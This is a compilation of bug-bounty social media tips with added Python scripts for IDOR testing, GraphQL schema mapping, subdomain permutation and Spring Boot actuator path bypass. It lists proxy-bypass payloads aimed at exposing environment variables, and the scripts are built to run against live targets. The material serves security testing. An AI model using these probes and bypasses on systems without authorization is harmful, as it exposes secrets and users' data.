We just dove into our shelf of archived bug bounty write-ups from the most notable hackers! 🤠
In this issue, we selected 5 compelling articles (that are still relevant today) to share with you, from which you can learn something new! 😎
🧵 👇
🔥 Ultimate IDOR Testing Checklist 🔥
📌 https://t.co/NcOjwsBrre
IDOR is still one of the most impactful bugs in bug bounty. Many critical findings start by simply changing an ID in a request.
💡 This checklist covers:
✔️ ID & UUID manipulation
✔️ API & version bypasses
✔️ Multi-account testing
✔️ GraphQL & WebSocket
✔️ Race conditions & batch abuse
✔️ Mobile, gRPC & blind IDOR
If you want high-impact bugs, don’t skip this. 🚀
#bugbountytips #bugbounty #infosec #cybersec
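The "multi-account testing" item on that checklist is the one most worth automating. The script below is an added example (not from the checklist or its author): it takes every object ID that account A legitimately owns, re-requests it with account B's session, and flags any 200 whose body matches what A saw. The `fetch` callable is pluggable so it runs offline against a constructed toy backend; the endpoint names, IDs, tokens and backend are all made up for this example.

```python
"""Differential IDOR check across two accounts (added example, constructed data).

For each (owner, id) pair the object is fetched with the owner's session as a
baseline, then with every other account's session. A 200 with an identical body
for a non-owner means the endpoint is not enforcing ownership.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple

# A fetch function takes (url, session_token) and returns (status, body).
Fetch = Callable[[str, str], Tuple[int, str]]


@dataclass
class Finding:
    url: str
    owner: str
    accessed_by: str
    status: int


def differential_idor(fetch: Fetch, template: str, owned_ids: Dict[str, List[str]],
                      sessions: Dict[str, str]) -> List[Finding]:
    """template: URL with an {id} placeholder, e.g. "/api/v1/invoices/{id}".
    owned_ids: account -> IDs that account legitimately owns.
    sessions:  account -> session token."""
    findings: List[Finding] = []
    for owner, ids in owned_ids.items():
        for rid in ids:
            url = template.format(id=rid)
            baseline_status, baseline_body = fetch(url, sessions[owner])
            if baseline_status != 200:
                continue  # the owner cannot read it either, nothing to compare
            for other, token in sessions.items():
                if other == owner:
                    continue
                status, body = fetch(url, token)
                # Same body for a non-owner: authorization is not enforced.
                if status == 200 and body == baseline_body:
                    findings.append(Finding(url, owner, other, status))
    return findings


# --- constructed toy backend: /invoices enforces ownership, /profiles does not ---
_TOKENS = {"tokA": "alice", "tokB": "bob"}
_INVOICES = {"1001": ("alice", "invoice 1001 total=120"),
             "1002": ("bob", "invoice 1002 total=80")}
_PROFILES = {"7": ("alice", "alice@example.test"), "8": ("bob", "bob@example.test")}


def toy_fetch(url: str, token: str) -> Tuple[int, str]:
    user = _TOKENS.get(token)
    if user is None:
        return 401, ""
    path, _, rid = url.rpartition("/")
    if path == "/api/v1/invoices":
        owner, body = _INVOICES.get(rid, (None, ""))
        if owner is None:
            return 404, ""
        return (200, body) if owner == user else (403, "")
    if path == "/api/v1/profiles":  # vulnerable: no ownership check at all
        owner, body = _PROFILES.get(rid, (None, ""))
        return (404, "") if owner is None else (200, body)
    return 404, ""


SESSIONS = {"alice": "tokA", "bob": "tokB"}


def run_checks() -> Dict[str, List[Finding]]:
    return {
        "invoices": differential_idor(toy_fetch, "/api/v1/invoices/{id}",
                                      {"alice": ["1001"], "bob": ["1002"]}, SESSIONS),
        "profiles": differential_idor(toy_fetch, "/api/v1/profiles/{id}",
                                      {"alice": ["7"], "bob": ["8"]}, SESSIONS),
    }


if __name__ == "__main__":
    for endpoint, found in run_checks().items():
        print(endpoint, "->", [f"{f.url} owned by {f.owner}, readable by {f.accessed_by}"
                               for f in found] or "no IDOR")
```

Against a real target, replace `toy_fetch` with a thin wrapper around your HTTP client and feed it IDs harvested from each account's own listing endpoints. Comparing bodies rather than just status codes matters: many apps return 200 with an empty or generic object for foreign IDs, which is not a finding.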
If you use Nuclei for bug bounty or recon, this repo is a goldmine.
Source: https://t.co/R1XkF0B6QV
It aggregates hundreds of public/custom Nuclei template repos in one place:
• CVEs
• SSRF
• SSTI
• XSS
• Takeovers
• WAF detections
• Fuzzing templates
• API checks
• and much more.
A very useful resource for expanding your custom scanning workflow and discovering community templates you probably missed. 🔥
#bugbounty #cybersecurity #appsec #infosec #nuclei #hacking
Don’t rush to report.
A UUID IDOR looked informative at first. Dug deeper, found an endpoint leaking valid IDs, chained both, and it became critical.
Full writeup: https://t.co/6RKQqCTnSd
#BugBounty #IDOR #hackerone
GraphQL Introspection Misconfiguration to Sensitive Data Exposure
POC →
1. While testing a GraphQL endpoint, noticed introspection queries were enabled in production
2. Sent an introspection query to map the full schema
3. Discovered hidden queries related to internal user and admin data
4. Modified the query to fetch user email, roles, and internal metadata
5. Server returned sensitive data without proper authorization checks
6. This allowed attackers to enumerate users and access restricted information
Learning →
- GraphQL introspection should be disabled in production environments
- Always enforce authorization on every resolver
- Hidden schema endpoints often expose internal business logic
#infosec #hacking #hacker #bugbounty #bugbountytips
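Step 2 of that PoC (map the full schema) is where most of the work happens, and it is easy to script. The following is an added example, not part of the original post: it holds the standard introspection query and parses a server's `__schema` response into a list of root query and mutation fields with their arguments and return types, flagging names that hint at internal or admin functionality so those resolvers get authorization-tested first. The sample response is constructed for this example and is not any real target's schema.

```python
"""Map a GraphQL schema from an introspection response (added example).

Takes the JSON returned for the standard __schema introspection query and lists
every root Query/Mutation field, rendering nested type references such as
[User!]! and flagging suspicious names. The SAMPLE_RESPONSE is constructed.
"""
import json
from typing import Dict, List

# Standard introspection query (trimmed to fields, args and 3 levels of type nesting).
INTROSPECTION_QUERY = """
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      kind name
      fields(includeDeprecated: true) {
        name
        args { name type { ...TypeRef } }
        type { ...TypeRef }
      }
    }
  }
}
fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name } } }
"""

# Name fragments worth a closer look; assumption for this example, tune per target.
SUSPICIOUS = ("admin", "internal", "debug", "export", "impersonat")


def type_name(t: Dict) -> str:
    """Render a nested __Type reference like [User!]! as a string."""
    if t is None:
        return "?"
    kind, name, of = t.get("kind"), t.get("name"), t.get("ofType")
    if kind == "NON_NULL":
        return type_name(of) + "!"
    if kind == "LIST":
        return "[" + type_name(of) + "]"
    return name or "?"


def map_schema(response: Dict) -> Dict[str, List[Dict]]:
    """Return {'Query': [...], 'Mutation': [...]} field descriptors."""
    schema = response["data"]["__schema"]
    roots: Dict[str, List[Dict]] = {}
    for key in ("queryType", "mutationType"):
        root = schema.get(key)
        if root:
            roots[root["name"]] = []
    for t in schema["types"]:
        if t["name"] not in roots:
            continue
        for f in t.get("fields") or []:
            args = {a["name"]: type_name(a["type"]) for a in f.get("args") or []}
            roots[t["name"]].append({
                "name": f["name"],
                "args": args,
                "returns": type_name(f["type"]),
                "suspicious": any(s in f["name"].lower() for s in SUSPICIOUS),
            })
    return roots


def suspicious_fields(response: Dict) -> List[str]:
    return [f["name"] for fields in map_schema(response).values()
            for f in fields if f["suspicious"]]


# Constructed sample introspection response (not a real target's schema)
SAMPLE_RESPONSE = json.loads("""
{"data": {"__schema": {
  "queryType": {"name": "Query"}, "mutationType": {"name": "Mutation"},
  "types": [
    {"kind": "OBJECT", "name": "Query", "fields": [
      {"name": "me", "args": [], "type": {"kind": "OBJECT", "name": "User", "ofType": null}},
      {"name": "adminUsers", "args": [
         {"name": "first", "type": {"kind": "SCALAR", "name": "Int", "ofType": null}}],
       "type": {"kind": "NON_NULL", "name": null, "ofType": {"kind": "LIST", "name": null,
                 "ofType": {"kind": "OBJECT", "name": "User", "ofType": null}}}},
      {"name": "internalAuditLog", "args": [],
       "type": {"kind": "OBJECT", "name": "AuditLog", "ofType": null}}
    ]},
    {"kind": "OBJECT", "name": "Mutation", "fields": [
      {"name": "updateProfile", "args": [
         {"name": "email", "type": {"kind": "NON_NULL", "name": null,
                                    "ofType": {"kind": "SCALAR", "name": "String", "ofType": null}}}],
       "type": {"kind": "OBJECT", "name": "User", "ofType": null}}
    ]},
    {"kind": "OBJECT", "name": "User", "fields": []}
  ]}}}
""")

if __name__ == "__main__":
    for root, fields in map_schema(SAMPLE_RESPONSE).items():
        for f in fields:
            arglist = ", ".join(f"{k}: {v}" for k, v in f["args"].items())
            flag = "  <-- review authz" if f["suspicious"] else ""
            print(f"{root}.{f['name']}({arglist}) -> {f['returns']}{flag}")
```

To use it live, POST `{"query": INTROSPECTION_QUERY}` to the endpoint and pass the decoded JSON to `map_schema`. One caveat on the "learning" list: turning introspection off hides the map but does not close the hole; the fix that matters is the per-resolver authorization check, since field names can still be guessed or recovered from client bundles.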
🔍 Testing an application with a GraphQL API?
Learn about common GraphQL vulnerabilities over at the Web Security Academy, and then scan your app with Burp Suite Professional or Burp Suite Enterprise Edition to find GraphQL bugs automatically.
#graphql
https://t.co/Td3PJODvUt
This one right here… insane value 💀🔥
🔗 https://t.co/XMJUEXp2Z2
Real bugs. Real reports. Real hacker mindset.
If you're serious about bug bounty, you NEED to study this.
#BugBounty #CyberSecurity #Infosec #Hacking
SecLists is a security tester’s best companion.
From usernames and passwords to URLs, payloads, web shells, and sensitive data patterns, it covers almost every recon need.
Use SecLists in your workflow to automate more and find more bugs. 🐞
Bug bounty tip 🔥
Most people stop at subdomain enum… real hunters go further ↓
Take your subs → generate permutations → resolve → profit 💰
Tools you should be using:
• Altdns: https://t.co/1EAylLYiHd
• dnsgen: https://t.co/TWTu9KkDYb
• gotator: https://t.co/R4wIfcUAvp
• shuffledns: https://t.co/0QB8BCS1qm
Pro move 🧠
Use target-specific words (from JS, GitHub, Wayback) instead of generic lists → this is where hidden assets live
Enumeration finds surface.
Permutations find gold. 🔥
#BugBounty #BugBountyHunter #InfoSec #CyberSecurity #Recon
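The subs → permutations → resolve pipeline above fits in a short script. This is an added example and not code from any of the listed tools: it generates dnsgen/altdns-style candidates (word as new label, word dash-joined to the first label, number increments) from known subdomains plus target-specific words, checks for a wildcard record first, and resolves the candidates through a pluggable resolver so it runs offline. The domain, words and fake zone are constructed; `system_resolver` is the drop-in for live use.

```python
"""Subdomain permutations with wildcard-aware resolution (added example, constructed data)."""
import re
import secrets
import socket
from typing import Callable, Dict, Iterable, Optional, Set

Resolver = Callable[[str], Optional[str]]  # hostname -> address, or None if NXDOMAIN


def permutations(subdomains: Iterable[str], words: Iterable[str], apex: str) -> Set[str]:
    """Return new candidate hostnames under `apex` built from already-known subdomains."""
    known = set(subdomains)
    words = [w.lower() for w in words]
    out: Set[str] = set()
    for host in known:
        if not host.endswith("." + apex):
            continue
        labels = host[: -len(apex) - 1].split(".")  # "api.dev" -> ["api", "dev"]
        first, rest = labels[0], labels[1:]
        tail = ".".join(rest + [apex])              # everything right of the first label
        for w in words:
            out.add(f"{w}.{host}")            # staging.api.example.test
            out.add(f"{w}-{first}.{tail}")    # staging-api.example.test
            out.add(f"{first}-{w}.{tail}")    # api-staging.example.test
            out.add(f"{w}.{tail}")            # staging.example.test
        m = re.match(r"^(.*?)(\d+)$", first)  # api1 -> api2, api3; api -> api1
        if m:
            stem, n = m.group(1), int(m.group(2))
            for k in range(n + 1, n + 3):
                out.add(f"{stem}{k}.{tail}")
        else:
            out.add(f"{first}1.{tail}")
    return out - known


def wildcard_addr(apex: str, resolve: Resolver) -> Optional[str]:
    """Resolve a random label; an answer means the zone has a wildcard record."""
    return resolve(f"{secrets.token_hex(6)}.{apex}")


def resolve_all(candidates: Iterable[str], resolve: Resolver,
                wildcard: Optional[str] = None) -> Dict[str, str]:
    """Keep candidates that resolve to something other than the wildcard address."""
    hits: Dict[str, str] = {}
    for host in sorted(candidates):
        addr = resolve(host)
        if addr and addr != wildcard:
            hits[host] = addr
    return hits


def system_resolver(host: str) -> Optional[str]:
    """Live resolver using the OS stub resolver (slow; use shuffledns/massdns at scale)."""
    try:
        return socket.gethostbyname(host)
    except socket.gaierror:
        return None


# Constructed inputs: known subs plus words scraped from JS/GitHub/Wayback
KNOWN = ["api.example.test", "app.example.test", "api1.example.test"]
WORDS = ["staging", "internal", "payments"]
FAKE_ZONE = {"api.example.test": "10.0.0.1", "staging-api.example.test": "10.0.0.5",
             "api2.example.test": "10.0.0.6", "payments.app.example.test": "10.0.0.7"}


def fake_resolver(host: str) -> Optional[str]:
    return FAKE_ZONE.get(host)


def run(resolve: Resolver = fake_resolver) -> Dict[str, str]:
    apex = "example.test"
    wc = wildcard_addr(apex, resolve)
    return resolve_all(permutations(KNOWN, WORDS, apex), resolve, wildcard=wc)


if __name__ == "__main__":
    for host, addr in run().items():
        print(host, addr)
```

The wildcard check is the step most quick scripts skip: on a zone with `*.example.test`, every permutation "resolves" and the output is noise. Filtering on the wildcard's address is a coarse heuristic (CDNs may front real and wildcard hosts on the same IP), so confirm interesting hits over HTTP as well.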
Spring Boot Actuators can expose sensitive information like env vars, heap dumps, configs, and internal metrics
And sometimes, with simple bypass tricks we can find them:
actuator/env;..
;/actuator/env
actuator;/env
actuator/env%00
actuator/env;
..;/actuator/env
static../actuator/env
actuator/health/..;/env
#bugbounty #bugbountytips #cybersecurity
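All of the path tricks listed above exploit the same gap: a front-end proxy or filter matches on the raw path string, while the application's path matching strips matrix parameters (`;...`), resolves dot-segments and decodes first. The script below is an added example, not from the original post: it generates that variant set for any actuator endpoint and probes them through a pluggable `fetch`. To run offline it includes a constructed toy of a prefix-blocking proxy in front of a rough approximation of framework path normalization; that approximation is an assumption for illustration, not Spring's actual code, so which variants land depends on the real target's stack.

```python
"""Actuator path-variant generator and probe (added example, constructed toy backend)."""
from typing import Callable, Dict, List, Tuple
from urllib.parse import unquote

Fetch = Callable[[str], Tuple[int, str]]  # raw path -> (status, body)


def actuator_variants(endpoint: str = "env", base: str = "actuator") -> List[str]:
    """Variants of /{base}/{endpoint} using matrix params, dot-segments and encoding."""
    return [
        f"/{base}/{endpoint}",             # plain request, the baseline
        f"/{base}/{endpoint};..",
        f"/;/{base}/{endpoint}",
        f"/{base};/{endpoint}",
        f"/{base}/{endpoint}%00",
        f"/{base}/{endpoint};",
        f"/..;/{base}/{endpoint}",
        f"/static../{base}/{endpoint}",
        f"/{base}/health/..;/{endpoint}",
        f"/{base}/./{endpoint}",
        f"/{base}/{endpoint.upper()}",     # only useful behind case-insensitive front-ends
    ]


def probe(fetch: Fetch, variants: List[str]) -> Dict[str, Tuple[int, str]]:
    """Return the variants that came back 200, keyed by raw path."""
    results: Dict[str, Tuple[int, str]] = {}
    for path in variants:
        status, body = fetch(path)
        if status == 200:
            results[path] = (status, body)
    return results


# --- constructed toy: prefix-blocking proxy in front of a normalizing app ---
def _app_normalize(path: str) -> str:
    """Rough stand-in for framework path matching: decode, drop matrix params, resolve dot-segments.
    This is an assumption for the example, not a faithful copy of Spring's behaviour."""
    segs: List[str] = []
    for seg in unquote(path).split("/"):
        seg = seg.split(";", 1)[0]        # "env;.." -> "env", "..;" -> ".."
        if seg in ("", "."):
            continue
        if seg == "..":
            if segs:
                segs.pop()
            continue
        segs.append(seg)
    return "/" + "/".join(segs)


def toy_fetch(path: str) -> Tuple[int, str]:
    # Naive front-end rule: deny anything whose raw path starts with /actuator/
    if path.startswith("/actuator/"):
        return 403, "blocked by proxy"
    if _app_normalize(path) == "/actuator/env":
        return 200, '{"propertySources":[{"name":"systemEnvironment"}]}'
    return 404, "not found"


if __name__ == "__main__":
    for path, (status, body) in probe(toy_fetch, actuator_variants()).items():
        print(status, path, body[:40])
```

Against a real host, wrap your HTTP client as `fetch` and diff the results against the plain baseline; a 200 on any variant while the baseline is 401/403 is the finding. Before reporting, confirm the body is actual actuator output (`propertySources` for `/env`, `status` for `/health`) rather than a catch-all page that returns 200 for everything.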
I saw this on LinkedIn. The AWASP Top Ten, a "vibe-researched and vibe-coded" alternative to the OWASP Top Ten.
https://t.co/wgMz9WAqgu
It's...interesting to say the least. 😅
Credit: https://t.co/RpTIq8UwjV